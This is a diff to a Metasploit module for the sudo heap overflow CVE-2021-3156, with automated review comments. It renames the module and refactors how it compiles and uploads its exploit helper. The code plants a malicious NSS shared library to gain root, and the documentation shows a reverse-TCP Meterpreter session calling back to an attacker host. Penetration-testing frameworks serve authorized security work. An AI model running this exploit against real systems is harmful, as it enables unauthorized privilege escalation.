diff --git a/documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md b/documentation/modules/exploit/linux/local/sudo_baron_samedit.md similarity index 89% rename from documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md rename to documentation/modules/exploit/linux/local/sudo_baron_samedit.md index bec5f07033..43e90f0ac2 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md +++ b/documentation/modules/exploit/linux/local/sudo_baron_samedit.md @@ -1,14 +1,14 @@ ## Vulnerable Application A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker -to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2 +to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker controlled library which results in it being loaded with the elevated privileges held by sudo. ### Manual Target -The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify +The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at [blasty/CVE-2021-3156][1]. @@ -41,7 +41,7 @@ Example steps in this format (is also in the PR): 1. Install the application 1. Start msfconsole -1. Do: `use exploit/linux/local/cve_2021_3156_sudo` +1. Do: `use exploit/linux/local/sudo_baron_samedit` 1. Set the necessary options (target, payload, etc.) 1. Do: `run` 
@@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1... -msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo +msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1 +msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1 SESSION => 1 -msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128 +msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 -msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1 +msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1 TARGET => 1 -msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit +msf6 exploit(linux/local/sudo_baron_samedit) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/lib/msf/core/post/linux/compile.rb b/lib/msf/core/post/linux/compile.rb index fa1500de5e..08d6cfdd04 100644 --- a/lib/msf/core/post/linux/compile.rb +++ b/lib/msf/core/post/linux/compile.rb @@ -15,14 +15,14 @@ module Compile end def live_compile? - return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + return false unless %w{ Auto True }.include?(datastore['COMPILE']) if has_gcc? vprint_good 'gcc is installed' return true end - unless datastore['COMPILE'].eql? 'Auto' + unless datastore['COMPILE'] == 'Auto' fail_with Module::Failure::BadConfig, 'gcc is not installed. Set COMPILE False to upload a pre-compiled executable.' end end 
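Review bot: `live_compile?` still falls through with an implicit `nil` when COMPILE is `Auto` and gcc is absent, because the trailing `unless` block is the method's last expression and evaluates to nil on that path; a predicate method should return a boolean, so add `false` as the final line of the method after that `unless ... end` block. The new `%w{ Auto True }` literal would read better as `%w[Auto True]`, which is the bracket form the Ruby style guide prefers for percent literals. The method itself is complete within the hunk, so both are one-line changes.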
@@ -44,7 +44,10 @@ module Compile unless output.blank? print_error output - fail_with Module::Failure::BadConfig, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable." + message = "#{path}.c failed to compile." + # don't mention the COMPILE option if it was deregistered + message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE') + fail_with Module::Failure::BadConfig, message end chmod path diff --git a/modules/exploits/linux/local/cve_2021_3156_sudo.rb b/modules/exploits/linux/local/sudo_baron_samedit.rb similarity index 74% rename from modules/exploits/linux/local/cve_2021_3156_sudo.rb rename to modules/exploits/linux/local/sudo_baron_samedit.rb index 4f0f096d60..1601d4dc3c 100644 --- a/modules/exploits/linux/local/cve_2021_3156_sudo.rb +++ b/modules/exploits/linux/local/sudo_baron_samedit.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Post::Unix + include Msf::Post::Linux::Compile include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper 
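Review bot: `message << ' Set COMPILE to False ...'` appends to an interpolated string literal; if this file carries `# frozen_string_literal: true` and runs on a Ruby older than 3.0, interpolated literals are frozen as well and the append raises `FrozenError`. Building the message non-destructively removes the dependency on the interpreter version: keep `message = "#{path}.c failed to compile."` and change the append to `message += ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')`. The enclosing `upload_and_compile` begins before this hunk and its closing `end` lies after it.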
@@ -17,10 +18,10 @@ class MetasploitModule < Msf::Exploit::Local super( update_info( info, - 'Name' => 'Heap-Based Buffer Overflow in Sudo', + 'Name' => 'Sudo Heap-Based Buffer Overflow', 'Description' => %q( A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker - to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2 + to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker controlled library which results in it being loaded with the elevated privileges held by sudo. @@ -60,17 +61,15 @@ class MetasploitModule < Msf::Exploit::Local ) ) - register_options( - [ - OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) - ], self.class - ) + register_options([ + OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) + ]) - register_advanced_options( - [ - OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/) - ] - ) + register_advanced_options([ + OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/) + ]) + + deregister_options('COMPILE') end def get_versions @@ -81,13 +80,6 @@ class MetasploitModule < Msf::Exploit::Local versions[:sudo] = version if version =~ /^\d/ end - # this libc version check will need to be updated to support non-linux targets like OSX - output = cmd_exec("ldd --version") - if output - version = output.split("\n").first.split(' ').last - versions[:libc] = version if version =~ /^\d/ - end - versions end 
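Review bot: The `Lengths` validation regex `/(\d+(,[ ]*| )){3}\d+/` in the re-indented `register_advanced_options` call is unanchored, so any value that merely contains four numbers passes — a constructed example such as `foo 1,2,3,4 bar` is accepted — although the description promises the `#,#,#,#` form; the value appears to feed the `arguments` handed to the compiled helper in `exploit`, so it should be validated strictly with `regex: /\A(\d+(,[ ]*| )){3}\d+\z/`. Use `\A`/`\z` rather than `^`/`$`, which only anchor per line. The description could also mention that whitespace-separated values are accepted, since the pattern allows them.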
@@ -103,6 +95,11 @@ class MetasploitModule < Msf::Exploit::Local [Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')], ] + if sudo_version == '1.8.31' + # Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31 + return CheckCode::Detected("sudo #{sudo_version} maybe a vulnerable build.") + end + if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) } return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.") end @@ -115,25 +112,6 @@ class MetasploitModule < Msf::Exploit::Local write_file path, data end - def upload_and_compile(path, data) - upload "#{path}.c", data - register_files_for_cleanup("#{path}.c") - - gcc_cmd = "gcc -o #{path} #{path}.c -lutil" - if session.type.eql? 'shell' - gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" - end - - output = cmd_exec gcc_cmd - unless output.blank? - print_error output - fail_with Failure::Unknown, "#{path}.c failed to compile" - end - register_files_for_cleanup(path) - - cmd_exec "chmod +x #{path}" - end - def exploit if target.name == 'Manual' fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank? @@ -146,13 +124,10 @@ class MetasploitModule < Msf::Exploit::Local path = datastore['WritableDir'] cmd_exec("mkdir -p #{path}/libnss_X") - register_dirs_for_cleanup("#{path}/libnss_X") - - file_name = rand_text_alphanumeric rand(5..10) - upload_and_compile("#{path}/#{file_name}", ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-3156', 'exploit.c'))) + file_name = rand_text_alphanumeric(5..10) + upload_and_compile("#{path}/#{file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil') upload("#{path}/libnss_X/P0P_SH3LLZ_ .so.2", generate_payload_dll) - cmd_exec("#{path}/#{file_name} #{arguments}") end end
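Review bot: The new Detected message reads `maybe a vulnerable build`, which should be two words: `return CheckCode::Detected("sudo #{sudo_version} may be a vulnerable build.")`. The special case also hard-codes a single distribution's backport; other distributions likely ship backported fixes under the same upstream version string, so the `Appears` result for in-range versions remains a heuristic, and the comment above the check could say so rather than naming only the Ubuntu build. The enclosing method (presumably `check`) starts and ends outside this hunk.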
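Review bot: The `exploit` hunk appears to drop `register_dirs_for_cleanup("#{path}/libnss_X")` without a replacement, and the shared object written by `upload` on the following line is not registered either (the removed module-local `upload_and_compile` registered its upload separately, which suggests `upload` itself does not); if so, the `libnss_X` directory and the planted library remain on the target after the session ends. Keep `register_dirs_for_cleanup("#{path}/libnss_X")` after the `mkdir` and add `register_files_for_cleanup("#{path}/libnss_X/P0P_SH3LLZ_ .so.2")` after the upload. Whether the removed marker before `cmd_exec` is a blank line or the execution line itself is not recoverable from the collapsed hunk; please confirm the helper is still invoked on the new side.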